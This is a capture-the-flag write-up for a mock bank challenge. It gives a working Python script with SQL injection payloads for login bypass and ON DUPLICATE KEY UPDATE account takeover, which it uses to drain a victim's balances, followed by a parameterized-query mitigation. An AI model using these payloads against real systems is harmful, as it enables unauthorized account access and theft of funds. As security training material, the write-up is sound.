Trustfall Bank – TOKEN4
Token: PCCC{Alice_is_broke_Cs_4569}
Background
Account creation is SQL-injectable. As Carol, inject Alice’s savings account
(5DA0D3F1) into Carol’s account list, then transfer both of Alice’s
balances to Carol’s investment (B93B14BD). Grading at
/grade/account-drain returns the token.
From Nothing to Working
- Login as Carol via SQLi (carol'-- -) to get a session.
- Abuse the /accounts/new SQLi to add Alice’s savings account number into Carol’s list.
- Perform two transfers: Alice Checking → Carol Investment ($7336.74) and Alice Savings → Carol Investment ($6820.37).
- Hit /grade/account-drain; success response includes the token.
Command
python3 token4_drain.py
#!/usr/bin/env python3
# token4_drain.py
import re

import requests

TARGET = "http://trustfallbank.us"
ALICE_CHECKING = "85A83FED"
ALICE_SAVINGS = "5DA0D3F1"
CAROL_INV = "B93B14BD"


def login_user(session, username):
    return session.post(f"{TARGET}/login", data={"username": f"{username}'-- -", "password": "x"}, allow_redirects=True)


def add_account(sess, name_payload, acc_type):
    return sess.post(f"{TARGET}/accounts/new", data={"name": name_payload, "type": acc_type}, allow_redirects=True)


def list_accounts(sess):
    r = sess.get(f"{TARGET}/accounts")
    return re.findall(r"[A-F0-9]{8}", r.text), r.text


def main():
    s = requests.Session()
    login_user(s, "carol")
    # Inject Alice savings into Carol accounts via ON DUPLICATE KEY UPDATE trick
    payload = f"x', 'savings', '{ALICE_SAVINGS}', 0.00) ON DUPLICATE KEY UPDATE user_id=(SELECT id FROM users WHERE username='carol') -- "
    add_account(s, payload, "savings")
    accounts, page = list_accounts(s)
    print(f"[*] Carol accounts: {accounts}")
    if ALICE_SAVINGS not in accounts:
        print("[-] Savings not visible; retry with different payload.")
        return
    # Transfers
    for src, amt in [(ALICE_CHECKING, "7336.74"), (ALICE_SAVINGS, "6820.37")]:
        r = s.post(f"{TARGET}/transfers/new", data={
            "from_account": src,
            "to_account": CAROL_INV,
            "amount": amt
        }, allow_redirects=True)
        print(f"[*] Transfer {src}->{CAROL_INV} ({amt}): {r.status_code}")
    grade = requests.get(f"{TARGET}/grade/account-drain")
    print(f"[*] Grade: {grade.text}")
    m = re.search(r"PCCC\{[^}]+\}", grade.text)
    if m:
        print(f"[+] TOKEN 4: {m.group()}")


if __name__ == "__main__":
    main()
Expected Output
[*] Carol accounts: ['85A83FED', 'E5215CD8', '5DA0D3F1', '18CD34BD', 'B93B14BD']
[*] Transfer 85A83FED->B93B14BD (7336.74): 200
[*] Transfer 5DA0D3F1->B93B14BD (6820.37): 200
[*] Grade: {"message":"tokenAccountDrain: Success -- PCCC{Alice_is_broke_Cs_4569}","success":true}
[+] TOKEN 4: PCCC{Alice_is_broke_Cs_4569}
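Mitigation
The fix for the account-creation flaw used above, as an added example that is not part of the original writeup or the challenge's server code: the account name is passed as a bound parameter, the account number and owner are set server-side, and the transfer debits only rows owned by the session user. The SQLite schema, function names and sample rows are assumptions, since the page does not show the real backend.

```python
import secrets
import sqlite3

# Assumed schema: the page does not show the real one. Columns are
# inferred from the payload (name, type, number, balance, user_id).
SCHEMA = """
CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT UNIQUE);
CREATE TABLE accounts(number TEXT PRIMARY KEY, user_id INTEGER NOT NULL,
                      name TEXT, type TEXT, balance_cents INTEGER NOT NULL);
"""

def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "carol")])
    # Constructed sample rows reusing account numbers and an amount from the page.
    db.executemany("INSERT INTO accounts VALUES (?, ?, ?, ?, ?)", [
        ("5DA0D3F1", 1, "Savings", "savings", 682037),
        ("B93B14BD", 2, "Investment", "investment", 0),
    ])
    db.commit()
    return db

def create_account(db, user_id, name, acc_type):
    """Bound parameters keep `name` as data; number and owner are server-set."""
    if acc_type not in ("checking", "savings", "investment"):
        raise ValueError("unknown account type")
    number = secrets.token_hex(4).upper()
    with db:  # commit on success, roll back on error
        db.execute("INSERT INTO accounts(number, user_id, name, type, balance_cents)"
                   " VALUES (?, ?, ?, ?, 0)", (number, user_id, name, acc_type))
    return number

def transfer(db, session_user_id, src, dst, cents):
    """Debit only when the source row belongs to the session user."""
    if cents <= 0:
        raise ValueError("amount must be positive")
    with db:  # one transaction: both updates commit or neither does
        cur = db.execute(
            "UPDATE accounts SET balance_cents = balance_cents - ?"
            " WHERE number = ? AND user_id = ? AND balance_cents >= ?",
            (cents, src, session_user_id, cents))
        if cur.rowcount != 1:
            raise PermissionError("source account not owned or insufficient funds")
        cur = db.execute("UPDATE accounts SET balance_cents = balance_cents + ?"
                         " WHERE number = ?", (cents, dst))
        if cur.rowcount != 1:
            raise LookupError("destination account not found")  # rolls back debit
    return True
```

With the name bound as a parameter, the payload from the script is stored verbatim as an odd account name and the ownership column on Alice's row is never touched.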